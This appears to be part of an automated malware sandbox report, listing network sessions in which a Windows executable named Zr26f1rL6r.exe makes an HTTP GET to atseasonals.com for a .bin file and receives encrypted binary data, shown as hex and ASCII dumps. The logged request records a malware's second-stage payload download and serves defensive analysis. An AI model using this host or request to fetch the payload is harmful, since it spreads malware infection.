2021-11-25 12:01:12 UTC	242	IN	Data Raw: 9f 4f 06 44 ed 3a 67 59 cc 84 6b 7b 2d c1 d9 f8 20 b1 c6 eb c2 28 b5 b6 fb a1 11 3e 80 aa 47 c1 50 98 fd bc ce de 3a 95 60 64 17 67 4e eb 32 49 be b4 0c d6 ba f8 9e 04 71 98 1b 82 3e 4a 26 25 b9 37 fd 1b 7c cf 67 ba 33 36 67 d4 00 9a 55 17 45 a0 fa bd 7e 1f f2 d7 03 23 43 a8 de 65 00 d3 08 03 ac 26 b0 2c 8c 9f 1e c0 da e5 37 2a 35 8f e7 cb 8b 47 8d 80 aa 84 3c 1a d1 1c 19 3b 59 32 00 ee a6 ee 0b 4e c7 d6 f8 60 ad b4 4e 79 42 75 54 88 f2 ab de 03 1b 96 83 4b 6a df 54 a9 aa 6e b0 e1 59 b2 15 34 66 e8 e4 10 64 a7 08 47 f3 f3 61 15 2e 78 ed a5 b0 da 42 62 c8 f5 ec fc 71 c6 15 d3 b6 70 90 fc de b0 d8 4c 15 cb a1 22 0d 1e 81 48 b6 16 0c 62 9e ee 76 33 fb 7a 62 30 2c a9 7a 45 06 87 0c 22 52 7a 0a 6c 7d d4 5c 7b 06 25 f8 e3 42 5f 87 a5 38 68 74 4a 91 e5 5e e3 9d Data Ascii: OD:gYk{- (>GP:`dgN2Iq>J&%7\|g36gUE~#Ce&,7*5G<;Y2N`NyBuTKjTnY4fdGa.xBbqpL"Hbv3zb0,zE"Rzl}\{%B_8htJ^
2021-11-25 12:01:12 UTC	250	IN	Data Raw: bf 18 09 42 e2 32 a7 0c 30 08 90 55 a3 2b b9 b8 84 1b 45 41 c0 82 0d f4 a3 b8 a8 a1 ae bf 2b 47 44 a8 2c 5b 84 87 82 7f c9 9b 6b 1f 6d 0d b8 2e 97 55 5e a3 b2 0e 82 ab fc 9e 64 d2 e3 db 86 9e 55 b0 a9 d1 f2 bb 97 b6 96 fa 25 c7 54 b7 c9 14 13 bd 1a af 9d 05 6a aa a7 80 ec cb a8 16 a0 38 10 e8 a8 69 ce d4 d1 a9 3f 51 0b 5a 61 f5 31 26 f6 f7 f7 5b 80 8e be bc fb 2f 27 9a 5b da 49 41 39 43 cd ac 92 7a 02 0f 2b d8 c9 56 b9 b8 cf 20 50 fb 06 c6 18 70 c4 62 b4 de 90 85 2b 5f e3 7d e5 8a 74 3e 54 ff 48 54 54 be b8 3b 55 e8 b3 16 07 4a 4b ff 86 83 6a 3d 2b c7 d1 3a ff 68 e3 f2 7c ee 76 ae 25 a6 a4 93 50 16 ff 63 44 28 38 44 cb 23 44 7e be 0e 8c a1 9e 33 02 54 7b ba 5d 74 3d 0e c7 eb 9c 51 cc db 9e 55 ea f2 fa 73 c5 2e 92 50 b4 6c 89 16 c5 98 1b 85 5a 11 b1 98 fc Data Ascii: B20U+EA+GD,[km.U^dU%Tj8i?QZa1&[/'[IA9Cz+V Ppb+_}t>THTT;UJKj=+:h\|v%PcD(8D#D~3T{]t=QUs.PlZ
2021-11-25 12:01:12 UTC	258	IN	Data Raw: 5d 34 b0 7b e5 91 6f 0b 13 20 17 da 67 57 a0 87 bf 95 4b 66 08 4b b8 f4 c4 76 99 4f 85 62 02 7e 7d c1 73 21 d0 bf 49 0d d8 7a 64 07 5f 4f ce 97 0a dc 94 26 24 cc a7 4c 6b 2f f2 7e d5 0d 1a 2d 1f 6b 5e d1 6c 73 4e 35 71 98 45 e0 30 a7 b3 8d e3 5d 52 d7 4c df 66 ca 50 e6 9e f9 db cb 67 4b 61 1b 57 48 5b 67 11 3f fc 47 11 41 a9 1b 47 a7 b8 c5 bd 5d 66 f8 13 45 90 28 7e 19 90 4b 33 56 49 07 39 04 76 b3 75 01 cd 93 5b ed 1d e3 5a db 2b d2 ec 35 77 76 79 03 df f5 d3 92 6d 4f 01 fe 86 4d 0b 07 3e 66 8d d9 0e c0 9b 7e cd be c2 80 5c 5e d5 b2 e2 15 84 2d 45 89 c4 ba e9 61 08 90 3f fe fe 22 7e ec 44 62 1b 5a 49 79 0a e9 f7 34 42 40 f0 a0 0a 7b 2a fd 43 2e b3 1f cf 90 f7 b9 c5 01 85 38 a2 62 bc 74 89 5f c5 3a 50 99 72 7b 4a 7a e7 4f 3e 3f 4f 01 07 17 8f 87 bb 3b 67 Data Ascii: ]4{o gWKfKvOb~}s!Izd_O&$Lk/~-k^lsN5qE0]RLfPgKaWH[g?GAG]fE(~K3VI9vu[Z+5wvymOM>f~\^-Ea?"~DbZIy4B@{*C.8bt_:Pr{JzO>?O;g
2021-11-25 12:01:12 UTC	265	IN	Data Raw: 18 ba d6 5f 31 8a 16 79 cd 91 4e f2 19 c0 f5 c6 18 df fe 49 41 a4 f9 01 01 c3 25 55 8b 7b b0 39 2d 43 7e f3 c0 eb 7a 5c d6 bc fe 7c 4e d0 ba 11 1e a4 17 b2 32 49 ce c7 7a 4e 8d b9 60 b8 33 b8 6d 1a 1d 83 d0 d2 a9 67 fc d6 70 ec 9d f4 a6 bd 6e 42 bd d6 80 76 ef df da 0d c8 05 47 ad b3 dd 5f 07 09 ba 73 79 96 b3 61 05 11 76 d1 62 e7 5f 5d 42 68 6b 6c b0 7c 3b c2 95 30 81 73 b3 09 38 ae 72 9e b7 c4 97 c2 e7 ca 91 83 30 b2 cf da aa 1b fa 3a 81 b4 90 12 de 6a 7a 66 5f cd b1 6d 9d 5a a9 e4 12 33 71 2f d1 0b 58 c2 41 59 a7 9f ae 57 ba da c6 cc be ec e5 b7 ad 90 16 3f 23 18 f1 78 a1 e6 64 42 92 13 28 a0 11 10 8f b0 25 fd b6 ab df 1c b7 53 bf bf 30 99 84 a1 6d 4f f4 d6 6f 06 a3 69 83 2a ac 32 1f 4d b2 91 8a a4 51 6c 98 d7 6d 3d 14 3f df 56 31 39 ed d0 3c ce ab fb Data Ascii: _1yNIA%U{9-C~z\\|N2IzN`3mgpnBvG_syavb_]Bhkl\|;0s8r0:jzf_mZ3q/XAYW?#xdB(%S0mOoi*2MQlm=?V19<
2021-11-25 12:01:12 UTC	273	IN	Data Raw: 6f 5d 45 95 9d 3b a9 46 1e a9 07 f0 80 ff 1a c7 4e 4d 60 f6 d3 24 ac 27 97 eb 78 e5 e4 a6 88 9b a3 fe 0a 74 0e 32 12 df 1c 3c 25 9c 0d 2f 91 02 62 3f c4 89 de 67 b4 4f 61 d8 7a 83 b1 61 55 39 e2 4b e9 6d 26 98 ce 55 e1 11 d3 32 0a 3d 68 6d c2 66 1b 83 d9 97 18 4e 47 56 c3 60 20 88 38 c2 f3 2e dc 30 4a 41 70 12 57 8b 03 ae 63 67 16 90 d4 ff a2 0a 98 d8 40 7d 17 e4 00 b6 c0 64 24 7c a8 16 dd 07 f1 21 cb 98 d6 27 39 3d a7 ec d0 07 2c eb ec 90 aa 8a 15 2e 68 5a 7f f1 9d 84 a6 31 df ee 0b 8b 7e be e3 e4 18 74 97 3f a2 a3 1d c8 16 63 da a7 49 8b 0a 4a 33 fa ff eb 53 3a 00 88 5f 82 e3 3f 29 fa c7 ef 47 6c 78 5b e4 49 ea 16 1c 84 e2 89 05 a2 3e 18 1a ef 81 a1 0f 5d 66 05 cd 9e e9 a7 39 c4 3a 1c be 6a b9 84 90 82 b3 2e 12 4f 3a 26 41 41 75 54 5d 38 69 c3 3e 92 18 Data Ascii: o]E;FNM`$'xt2<%/b?gOazaU9Km&U2=hmfNGV` 8.0JApWcg@}d$\|!'9=,.hZ1~t?cIJ3S:_?)Glx[I>]f9:j.O:&AAuT]8i>
2021-11-25 12:01:12 UTC	281	IN	Data Raw: d7 10 b6 98 45 cc 3c 2d e9 70 9f 88 67 fe 72 93 45 00 1d c6 9b 03 23 12 a3 77 0d e2 5b ea 8b 15 f5 ba d5 3d 5c f6 4b d5 b4 61 9a 8b a9 6f 43 88 8a 8c 8b 8c 4b 9c 87 62 97 fc 66 9a e9 3a 8b 21 e2 b2 c7 2e 5d 99 66 5c 78 22 51 43 75 54 53 c8 c8 23 b0 18 90 8e c2 88 20 f9 e7 07 96 e0 6a df 0a d1 5c ee 31 e7 97 dd 65 b8 ea 5e 61 df 9c 7b 80 05 9b 3e b2 ca 61 57 2f 53 80 be 77 ea 10 dd b4 a0 a3 80 50 1a 24 9d 43 72 21 01 d4 a0 34 b0 c1 91 5d 15 60 7e 61 38 93 3d 97 2b db fc 55 54 d7 87 a4 0e b3 e3 73 cf 7b 28 b7 bd 77 aa b1 13 51 ac eb fd e0 fc 49 6f 15 ea 97 ba 9c b5 d5 66 5f 48 f4 93 02 76 00 bb 3f 08 2e 5c 21 56 17 23 56 e8 85 35 1c 3e 28 88 72 c7 3d d0 6d b3 23 00 73 36 17 c0 c9 fa c1 1f 5d 25 47 a2 a7 7e 30 58 b7 d5 2f 03 de 2c 4b 05 5d 85 a9 b9 63 36 fb Data Ascii: E<-pgrE#w[=\KaoCKbf:!.]f\x"QCuTS# j\1e^a{>aW/SwP$Cr!4]`~a8=+UTs{(wQIof_Hv?.\!V#V5>(r=m#s6]%G~0X/,K]c6
2021-11-25 12:01:12 UTC	289	IN	Data Raw: 77 d8 7b 6b 2a 25 48 05 38 5e 9d dc f4 d5 3c 5d e0 6e e4 c8 68 e7 36 a5 16 5a 57 9b 93 9c 0c 60 78 8c 64 f7 4c 19 9e c8 33 5e 88 6e cf 74 36 3e 04 4f 09 ea ed c5 a0 59 b6 9e df dd 6e 38 70 0d 5c e9 b5 4b 39 d8 0d a4 54 49 21 d1 5c 77 d0 6c a6 50 75 c9 e3 e0 58 c7 6a 53 79 02 74 05 5a ae 8a d6 83 0c 58 7a 6f c3 4a 54 b1 aa 7c 6a 0f 22 66 7e da 93 a1 94 3f 56 58 62 52 0b 69 bb 7a 3d fe bf a3 32 07 83 f0 9d b1 c9 a2 64 07 f7 ea 9b 79 6d d3 30 72 a2 49 17 2d e3 35 af 55 f3 b4 aa e4 70 ed 05 8c f2 a5 de b7 08 77 56 fa 52 c8 9d d8 10 54 46 9e ec 20 66 3a a1 4b 55 3f 11 a6 fd ca f1 2c cc a6 18 1b b6 02 21 ec f3 55 2b 67 16 d5 86 01 3b 2b 8a 92 86 c5 87 df 33 ce 8f 80 ef cf dd 67 9a 1c b9 12 3e cb a2 d2 53 e6 59 a9 4a 31 bf 19 18 a0 d3 d9 df 5e d1 42 b2 1e f3 e0 Data Ascii: w{k*%H8^<]nh6ZW`xdL3^nt6>OYn8p\K9TI!\wlPuXjSytZXzoJT\|j"f~?VXbRiz=2dym0rI-5UpwVRTF f:KU?,!U+g;+3g>SYJ1^B
2021-11-25 12:01:12 UTC	297	IN	Data Raw: cb 25 e9 09 0a 08 6c 8d 8b 5b 75 bd f1 b1 f1 0d 75 87 30 c0 6a 79 ca 9a 11 96 39 85 12 83 5b ec cb c2 11 25 bf 7d 84 49 61 87 75 48 20 d3 77 54 80 6d 37 d6 21 5f f7 3a 47 51 af d0 51 81 fa 8a 4c 26 63 57 94 fd 3d f7 d7 e7 68 b1 73 f4 97 f4 f0 c4 79 dc 51 18 5c 96 56 23 ea 00 35 e3 40 c1 24 d2 f5 1f 01 93 c3 f7 73 79 10 02 14 f7 8c dc 89 2c 3a a8 84 ad 05 81 69 03 54 95 e9 ca 86 f7 b0 f1 15 f7 7d 81 31 5b 95 bd 4d a1 3e ad a4 0a e6 54 40 fb f9 20 09 aa a8 80 88 2a fa e5 0f 89 3a 3b 4a b9 ec cd bc e4 2e 6f 43 f4 1e ae 6d 18 75 46 3c a5 4f db 34 9c 46 8e ce 9b b1 93 43 fc eb f1 43 76 76 eb 4c a0 b4 c5 7d 49 44 3b f3 22 61 46 c5 ac ed ca af ad b4 eb d0 ab 13 80 af 21 78 a0 df c5 1c 87 fc 15 80 eb 65 84 73 26 72 96 b3 fe 20 21 79 fd 60 2f 60 a9 6c ec f9 cf 4a Data Ascii: %l[uu0jy9[%}IauH wTm7!_:GQQL&cW=hsyQ\V#5@$sy,:iT}1[M>T@ *:;J.oCmuF<O4FCCvvL}ID;"aF!xes&r !y`/`lJ
2021-11-25 12:01:12 UTC	304	IN	Data Raw: 14 27 0b 9e 3f 22 e9 e1 4b d7 fd cc 2a a7 20 d8 27 4a 9c 34 f2 fa 06 6b 51 fe e8 1e ef d9 65 5a 30 88 ae 98 ec 32 c0 2b 3b f3 6b 7d 5e 83 15 29 c8 e7 62 72 4f 8c 26 85 aa fa cf 66 09 05 02 d1 12 ae 29 d8 86 31 29 1e 97 c9 89 c3 d7 06 9f 65 8f 3e c1 85 6c 36 fd 3c 3a 7e 39 a8 d8 ce 56 6a 11 ec 96 bb 06 9e 1f bc d1 08 55 d1 21 b0 f2 d2 e2 af 1c ad d9 fa 80 cc be 13 3c 63 f4 d9 29 6d 36 61 01 2a 29 84 0d 19 8f 4a 65 9a 08 8d 93 60 57 20 9a 19 ec 50 27 97 5c da 73 d2 4a 49 73 64 fa ee 91 c5 c2 e5 69 16 f4 3e 59 92 80 2c 94 20 8f 45 08 cb 2d 15 35 8f f3 4b 37 e6 65 cb bc 8e 2c d3 63 82 f4 81 74 54 03 3b 09 9d 85 4e da 1e a3 23 5a 54 72 7d 03 30 a8 bb 60 2e 83 4e dc 16 7d ef fe 6e 6d 33 b1 f0 a1 64 a6 48 3b 4f 21 2b 9e 7f 39 4d c1 5a 3e 27 bd eb e3 29 c9 27 eb Data Ascii: '?"K* 'J4kQeZ02+;k}^)brO&f)1)e>l6<:~9VjU!<c)m6a*)Je`W P'\sJIsdi>Y, E-5K7e,ctT;N#ZTr}0`.N}nm3dH;O!+9MZ>')'
2021-11-25 12:01:12 UTC	312	IN	Data Raw: 7d ee 93 7c c8 a7 54 e9 e1 5f 44 d4 7b 12 05 02 53 9a 24 be 8f ee 28 6e 94 04 0b e3 80 fc 64 b6 94 90 4d c1 cb 50 70 5b 0c e3 da 4d 13 12 79 c9 d5 39 2c ba 06 19 fa 4f 70 ca 7f cc dd 3d 43 10 1c 4a 6b 80 dd b6 b9 3c e5 4f 38 8b 8b af 80 fd 32 8e 5c 66 e9 be 8e 5c da 58 ce 0c e9 a1 5d fe de 19 6d 15 ec 43 35 f6 8f b6 5d 29 e9 ab ed 8e 13 13 01 6c c1 b6 66 7e 9e d8 ea 93 9e 56 cb 42 90 99 98 79 ca cb d1 d6 aa 89 d0 d6 81 1c 74 cd 82 e0 6b 93 48 f2 0f 9c c2 fb ee f8 ca 1b 76 60 c2 ae ab 9b 5d 07 1d cd 6d 03 39 4b 02 c2 06 5e fa e6 d2 57 5d 95 38 2c aa 8d 0f 9b a8 dd 19 c5 52 b3 1f ad b5 02 25 ab 37 36 60 25 b8 cc cd 2c 39 71 e8 86 57 cc 8d 44 ea 3e 87 9f 5b 0a 60 8b 99 66 aa b4 52 b4 91 ca 69 c7 29 63 93 e4 9e 0c c0 ee 48 c3 41 2a 4b d5 ff 09 33 8b 8f 7e 30 Data Ascii: }\|T_D{S$(ndMPp[My9,Op=CJk<O82\f\X]mC5])lf~VBytkHv`]m9K^W]8,R%76`%,9qWD>[`fRi)cHA*K3~0
2021-11-25 12:01:12 UTC	320	IN	Data Raw: 07 13 23 bb 38 c9 12 7e 8f ba c8 7b 28 f2 25 a6 e8 69 ac ac 9a dd 8f 1d a9 13 57 58 58 e8 63 34 d0 83 66 01 0d 00 6c 4b 59 dd 90 91 dd 19 42 76 7f e8 78 a2 04 fb 83 63 bd 05 c7 d2 0e e1 d9 00 60 8a 34 73 c8 78 3e 5b e7 3e a3 9d ed 5b 1a 06 f0 9f 51 fa 44 a4 95 ae 99 79 f2 2b 5c 9f c0 c4 5b 64 a1 76 e2 26 98 54 b0 67 60 f8 9b a2 b3 6a 1d d4 ac 87 32 f3 54 da 1b 70 52 c3 09 51 1c 05 4a 39 37 8c 1e d5 98 4a dd 10 04 06 0e ab c0 ec de 54 c1 e5 4b e3 9f a9 b5 33 0b 6d 03 3b ea 64 49 a1 8a c4 0d 1b d3 59 41 4a 0d 86 49 38 72 c8 ca cd 5f cf 0c 86 70 a9 fc f7 09 35 b1 a9 71 42 c4 37 f4 b8 4f 18 f7 22 b0 e9 62 6e b5 c8 df 7e 73 f2 93 ab 94 f2 9e 37 6b 95 f3 05 3d 96 36 a0 97 a6 db a5 95 e4 a7 7e 3a e0 e6 ed 80 3b 17 16 ed fc ab d1 bc 64 ff 41 fb eb 91 c1 8e 6f f4 Data Ascii: #8~{(%iWXXc4flKYBvxc`4sx>[>[QDy+\[dv&Tg`j2TpRQJ97JTK3m;dIYAJI8r_p5qB7O"bn~s7k=6~:;dAo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49840	107.6.148.162	443	C:\Users\user\Desktop\Zr26f1rL6r.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-25 12:01:25 UTC	327	OUT	GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: atseasonals.com Cache-Control: no-cache
2021-11-25 12:01:25 UTC	328	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 12:01:25 GMT Server: Apache Last-Modified: Wed, 24 Nov 2021 12:20:38 GMT Accept-Ranges: bytes Content-Length: 167488 Connection: close Content-Type: application/octet-stream
2021-11-25 12:01:25 UTC	328	IN	Data Raw: 70 99 d0 d2 81 fc a4 8c 6e ba 05 d0 4f 67 65 7f 4e 1e 4a f3 03 49 ab 4d f8 3b 67 96 a3 b5 f7 07 46 d9 a0 8b 7f 32 0c 43 a2 5a 42 b2 12 de b0 f4 94 d3 dc 46 6c cf 8e 15 59 63 2a 6b 99 39 71 c3 a8 94 6c 4a 84 13 81 5d 6a 1e 54 51 46 ba f1 ed d4 08 c0 6b 8d b8 64 71 ec 91 c7 1a 01 6d 7f 49 a6 3a 51 3c d1 ca 0c 98 4f 06 47 24 6b ec 56 9c d7 39 29 7f 90 8f 10 2b ff c6 eb 49 87 e7 e0 70 77 e6 54 c0 aa f3 4b 59 89 c0 66 fa 8f 90 47 e4 0a 64 47 b5 d4 b5 71 92 58 65 b7 82 12 15 37 dd 6f c2 ec 2e 2b df 1d cf 2c 5e 7a d8 f2 d7 16 ec 09 81 e5 9d 39 0d e2 1d d4 71 ba ff de 2e 9b 03 5e 74 c4 af 5c 6d 82 2a 3a fb 21 10 13 c5 ce 56 69 4f 4e 29 b7 4f 90 af e9 9a cd 2d 39 69 e5 2b 66 10 5b b4 5e 9d e0 b1 b1 c0 09 52 76 c0 87 33 99 a3 bb ca 51 43 75 54 5b 4e a0 ab 74 91 19 Data Ascii: pnOgeNJIM;gF2CZBFlYck9qlJ]jTQFkdqmI:Q<OG$kV9)+IpwTKYfGdGqXe7o.+,^z9q.^t\m:!ViON)O-9i+f[^Rv3QCuT[Nt
2021-11-25 12:01:25 UTC	336	IN	Data Raw: 8e bc 4e ec 48 d6 a2 16 02 23 e6 e8 1f c6 a2 f1 87 bf bc dc f2 e5 1d 71 93 43 e5 f8 66 89 73 ea 07 49 9d 46 cf 62 29 04 b0 e9 ff 10 16 06 87 4d 38 5b 62 65 fc dc 00 f5 ba 79 ad 56 32 fd 03 8f fb 4b a3 5d d9 ce 81 4a 9e 3d 17 f4 d2 a1 c7 87 3d fd 91 4b 9a 13 dd 39 3b e3 c6 4f 06 1c 79 d3 83 26 00 53 1b 67 5c 44 5b d7 c5 62 93 8e 6f 5e 54 c7 c8 d9 a6 d5 ad 5a 6e da 10 69 c7 77 c2 68 d5 b1 0a 47 90 e0 8d 6a c4 32 66 27 47 62 84 7f 3d 22 1c 03 85 6c ab 59 45 eb 4f 70 ed 38 f2 31 d8 5d 7f f7 6a d4 8d e0 3d 2c 94 bd bd 34 7c 13 68 7f d2 e5 fe c7 04 85 50 1c bd f6 f8 38 d0 29 78 5b 26 a9 d3 c5 eb 01 5f 8a aa 88 23 3f 9d 0e a8 06 f9 96 8b 3e 21 23 9c 5b 82 da cd 2b 99 a0 fe 37 cb c6 17 31 d1 3e 34 39 7e 3f 48 2b bc 10 99 e2 7e 1d 53 6c e7 67 00 b8 4c cb 8f 35 3c Data Ascii: NH#qCfsIFb)M8[beyV2K]J==K9;Oy&Sg\D[bo^TZniwhGj2f'Gb="lYEOp81]j=,4\|hP8)x[&_#?>!#[+71>49~?H+~SlgL5<
2021-11-25 12:01:25 UTC	343	IN	Data Raw: 17 ca c7 b5 b0 fd 86 d4 50 e2 18 b0 be fc 2c 30 5c 16 11 88 54 5e c2 28 df 35 9a e5 69 10 10 31 89 2f e6 ff 54 6f a8 c6 95 52 74 48 c3 55 81 2d a3 39 d4 90 8c de 8f ac 70 eb d0 5c 9a b4 cb c6 df e5 6e 92 bb e0 07 43 df 69 24 b6 a3 ff 52 4d 29 ca 8f 99 4e 68 fd 8d 02 21 f9 01 4f d0 f8 f4 b2 d7 01 9e 4f 32 70 2f 03 53 61 cf 97 3d 62 d8 cb 03 51 97 a7 1f fa e3 e0 00 ae 92 0e 09 13 96 7e 52 65 3e 2c 36 85 a9 5f 75 e6 c6 6b 89 c3 66 55 25 98 6d c9 f0 bf 96 47 05 9a 61 2d 1b 23 3c d2 96 92 82 cd d6 ba 3e e6 4b 58 a5 48 1a 87 7a 4e a4 a1 b0 2f c4 55 d6 16 76 a6 7e 33 3e 12 d9 fe 29 5c 1b e6 13 d5 ac a1 ad c2 77 9a 02 73 8b ad 40 f6 2c 55 64 27 90 b5 a5 e4 a9 df 87 eb b3 1f 0e 25 a1 6a 1c 00 e9 16 a1 dc 22 2a cc fc 49 cb 9d 4b 61 fc 33 db 5f 43 37 03 c7 17 86 ac Data Ascii: P,0\T^(5i1/ToRtHU-9p\nCi$RM)Nh!OO2p/Sa=bQ~Re>,6_ukfU%mGa-#<>KXHzN/Uv~3>)\ws@,Ud'%j"*IKa3_C7
2021-11-25 12:01:25 UTC	351	IN	Data Raw: 5e 04 43 a7 80 c5 2e bc ac 30 1b fd 04 75 d2 7b c3 ff 8f b3 94 45 75 96 b0 c1 0e c5 b4 fe 2c b1 ea f1 19 bc 38 04 74 40 f6 58 cf 71 0f 1d 37 59 d4 56 20 d6 3b 0b 08 06 2b 25 af 1c e8 5d 25 2b a9 a9 84 c0 fc 5c 15 9e 07 91 73 db 7e b9 86 27 ec 6f ef 41 31 47 63 86 4f b4 d0 c0 7e 85 7f 34 15 92 9b a9 64 70 cc de 9f a5 6e db 3f e8 ec 35 9e a0 26 0f 59 b8 24 95 fd 58 9f 6f 6a e5 01 85 0a 0b 08 6a e0 61 43 7d 0a 70 5d d7 d5 19 95 5a d5 8c f0 37 72 50 a0 cc f8 47 f9 ef af e9 4c 94 65 65 81 fa 5c 37 a8 cb a6 7c dd a5 58 79 e1 91 0a 47 af 03 bc cf 03 e8 4d d6 93 39 65 e6 7b 6a fb 85 bc aa 46 76 d9 b3 d3 9e 04 54 9e 7f e3 4f 52 87 33 b9 08 2f a0 02 a8 b2 21 6e 07 d1 3a 84 8d 7a 08 c8 80 91 23 98 0b cb b7 03 07 3e 34 a9 c8 c4 db f6 7c 5d 81 f9 6a 58 32 78 f5 85 ae Data Ascii: ^C.0u{Eu,8t@Xq7YV ;+%]%+\s~'oA1GcO~4dpn?5&Y$XojjaC}p]Z7rPGLee\7\|XyGM9e{jFvTOR3/!n:z#>4\|]jX2x
2021-11-25 12:01:25 UTC	359	IN	Data Raw: 10 24 e9 36 49 4b 33 3f ba 8b 32 30 9e 48 46 3e 28 e7 ce c7 f9 03 d0 c0 2b f2 4b 41 2c 3a 96 8e 46 0d 63 2d d7 0b 4e d7 ba ef b6 ec 68 3b e0 4e de 91 bd dc 1b d2 04 7c c0 14 44 a9 bf 32 ea 46 fa 70 92 bb e4 c5 95 17 c9 a0 2b 0a 81 c4 0d 82 88 14 16 3b 92 db 30 c5 f8 f6 f5 b3 c6 8c ba b6 c4 91 6a 02 82 a5 9b 20 f9 72 f0 00 6f 46 3d 6c 9b f0 19 de 6a 19 23 92 bb 0b fb 12 49 d8 d1 4e 31 fa ca 64 ef 07 91 de 08 9e f0 1b c4 57 59 a7 89 e0 ea d6 40 3c d5 1e d7 ea 6e c0 f1 67 de c3 ef c4 80 61 ac 13 a5 fa 22 90 53 e0 43 11 ec c3 e9 c4 f0 78 10 cd eb 15 6c 89 de e4 fe da 0c 85 a1 7c e1 ec 18 42 b4 26 ea ea 93 ec 02 99 62 cb 42 0d b1 ce c6 06 10 35 4b 6b dc 91 88 92 c5 92 42 60 e4 07 80 b6 f6 b7 dc 88 2f 35 f3 c9 a7 ca 6e 25 6b 6f 92 8c 5a ac 9d 81 6f 70 42 41 83 Data Ascii: $6IK3?20HF>(+KA,:Fc-Nh;N\|D2Fp+;0j roF=lj#IN1dWY@<nga"SCxl\|B&bB5KkB`/5n%koZopBA
2021-11-25 12:01:25 UTC	367	IN	Data Raw: 8c e2 92 21 9f f8 12 80 71 84 bb 0d 80 91 03 cc 26 88 73 33 ec 1a dd b9 91 14 4c 37 25 ba 25 7e ef 29 a1 28 6c c5 3d bb 07 44 cd e3 18 34 78 b9 e8 f0 f3 88 4f d4 cb 68 a4 fc 81 7b 7d 01 17 38 a3 f9 03 2f 47 85 af 26 e8 15 78 e9 d3 8a 28 94 95 0c e9 77 8b c1 d0 0f 3b 94 07 9b 6d 7a 2e ca fa ce 04 90 40 1e 60 b7 42 32 d7 88 60 d7 01 4c a0 5e cd 95 16 83 c1 e5 19 71 d4 ff ef b3 dc a3 40 aa 69 a1 87 79 10 75 a2 d9 c6 08 60 bc 69 b4 13 01 ef 9c b6 75 ea 17 ed 29 9a 03 a0 d6 eb b7 a5 0c 5a 64 5c a2 2b d3 cf 9f 5c 5e ac 0a d6 34 49 a4 4a a2 c7 83 ee 75 86 ae c1 67 cf 6f ca 3f 0e 9e b0 f9 e3 f9 e7 7f b7 97 3e 5b 8a a2 bb 41 14 53 f6 90 07 8e 60 df 0a f8 18 77 4c 6a 8f 8b 69 1f c7 08 6d cc 53 12 bf 2b b1 e2 4a c4 a6 d7 50 59 f2 5d 9c 2a 68 71 21 fd da 71 20 5c 63 Data Ascii: !q&s3L7%%~)(l=D4xOh{}8/G&x(w;mz.@`B2`L^q@iyu`iu)Zd\+\^4IJugo?>[AS`wLjimS+JPY]*hq!q \c
2021-11-25 12:01:25 UTC	375	IN	Data Raw: 77 74 a8 2a 4b e2 06 58 96 8d ca 8d 97 65 ff 91 4b 09 4b d8 7f 8a 8e 9a b1 7a 27 ad e7 be 0a c7 2a 84 66 f3 ed 22 14 a0 8a ab 86 86 a0 57 c7 6f 49 8f 15 82 df 06 4e ee 1b 5c 2f df ae ed cb 0c b3 38 49 dc d3 b9 ea 5e c8 37 11 ee 80 f9 3c 02 88 cf ac d7 f7 ec fc a8 71 ea 2c b6 70 94 26 40 07 5d ce 15 cb fa 24 65 43 be 34 b0 53 91 40 fd 60 7e 3a 3b 2a 60 f3 8c 2f 3f bd d9 42 87 58 a9 8f 58 3c c4 93 32 74 55 f4 6e a1 4c b1 6e 83 75 68 2a 4a 63 ea cb 02 48 d2 d8 d5 9a a0 b7 fc 06 03 1a 56 ba 3f 46 4b 5c dd a9 e8 2a 7d df fb 81 e2 7b b7 60 72 c7 5b 59 a1 35 ca e0 7f 37 65 86 21 06 3e e0 0d 95 41 ac 28 fe 43 2b 31 3d d3 fc 21 7d 45 2e f3 d0 cb b9 1f 31 33 22 df 1d 92 a1 fe 51 3d dd d7 2a 99 ee d0 7d 36 26 61 80 a9 c0 f3 18 39 8e 12 f9 c0 d1 a8 15 3d 5f 2f c9 82 Data Ascii: wtKXeKKz'f"WoIN\/8I^7<q,p&@]$eC4S@`~:;`/?BXX<2tUnLnuhJcHV?FK\}{`r[Y57e!>A(C+1=!}E.13"Q=}6&a9=_/
2021-11-25 12:01:25 UTC	382	IN	Data Raw: 93 f7 95 01 1c e9 c9 90 db 44 18 c7 57 d0 65 23 22 c6 e3 c8 e8 80 e5 ee 48 59 19 f8 44 3f 5a 75 8b ab f1 fd 5b 06 57 6a 17 2d b3 e0 72 42 bc f5 13 a7 75 1a 9a c1 ad fe 4f cd 14 9e 03 2b 88 7c 5c 2d de ce 87 bc 11 6a 59 ba 4d fb c2 82 cd 64 f5 a3 d0 35 13 1f 03 48 7d 4f 0b ae 21 9c 2e 3f af ea b2 ed b3 c9 a7 85 bf 28 3a d8 92 a5 97 f7 58 6e 54 5d 55 59 b9 c8 70 61 b3 c5 12 1d 94 99 4b 0e 46 70 95 fa 71 be 7a 19 bc 37 de 26 a5 ab 9b 17 51 14 dd 66 56 fe 0b e3 d4 a9 5b fb d2 71 2a 86 9d 04 9d 71 a0 dc f7 dd 00 fe b7 47 c8 ef 63 22 56 3c c7 bd c8 38 c9 13 86 fc 3d f0 20 87 af 9f 46 1e bd bf 5e a8 85 3e 73 78 06 b5 45 c5 62 eb 73 8f eb ec e4 1d 01 2e 4d 1c 89 c4 3d 54 c8 fe f1 95 7c 0b c4 4a 71 37 e0 19 d0 dd ba 8d e7 1d bd fb 49 18 0f 47 81 bc 97 af b3 93 75 Data Ascii: DWe#"HYD?Zu[Wj-rBuO+\|\-jYMd5H}O!.?(:XnT]UYpaKFpqz7&QfV[q*qGc"V<8= F^>sxEbs.M=T\|Jq7IGu
